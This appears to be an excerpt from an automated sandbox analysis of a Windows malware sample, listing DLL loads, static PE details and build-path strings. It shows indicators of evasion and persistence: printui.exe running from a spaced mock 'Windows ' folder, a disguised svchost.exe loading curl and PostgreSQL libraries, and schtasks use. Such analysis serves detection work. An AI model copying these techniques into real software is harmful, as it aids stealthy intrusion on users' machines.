Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows \System32\printui.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows \System32\printui.exeSection loaded: printui.dllJump to behavior
Source: C:\Windows \System32\printui.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: libcurl.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: libpq.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: libssl-3-x64.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: libcrypto-3-x64.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: libintl-9.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: libwinpthread-1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: libiconv-2.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: zlib1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: libcurl.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: zlib1.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: libcurl.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: zlib1.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: 58VSNPxrI4.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 58VSNPxrI4.exeStatic file information: File size 14664704 > 1048576
Source: 58VSNPxrI4.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xdb5c00
Source: 58VSNPxrI4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 58VSNPxrI4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 58VSNPxrI4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 58VSNPxrI4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 58VSNPxrI4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 58VSNPxrI4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 58VSNPxrI4.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 58VSNPxrI4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848750352.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 00000020.00000002.1808383974.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826773265.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: vcruntime140d.amd64.pdb source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: vcruntime140d.amd64.pdb,,, source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848937066.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 00000020.00000002.1808546257.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 0000002A.00000002.1827116011.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2847753443.00007FFBAA01B000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2849098201.00007FFBC31F8000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2849098201.00007FFBC31F8000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848937066.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 00000020.00000002.1808546257.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 0000002A.00000002.1827116011.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: ucrtbased.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, ucrtbased.dll.13.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: PrintUI.pdb source: 58VSNPxrI4.exe, 00000000.00000003.1683788301.000002B6E7A91000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000D.00000000.1687556930.00007FF616B12000.00000002.00000001.01000000.00000005.sdmp, printui.exe, 0000000D.00000002.1759138370.00007FF616B12000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: PrintUI.pdbGCTL source: 58VSNPxrI4.exe, 00000000.00000003.1683788301.000002B6E7A91000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000D.00000000.1687556930.00007FF616B12000.00000002.00000001.01000000.00000005.sdmp, printui.exe, 0000000D.00000002.1759138370.00007FF616B12000.00000002.00000001.01000000.00000005.sdmp
Source: 58VSNPxrI4.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 58VSNPxrI4.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 58VSNPxrI4.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
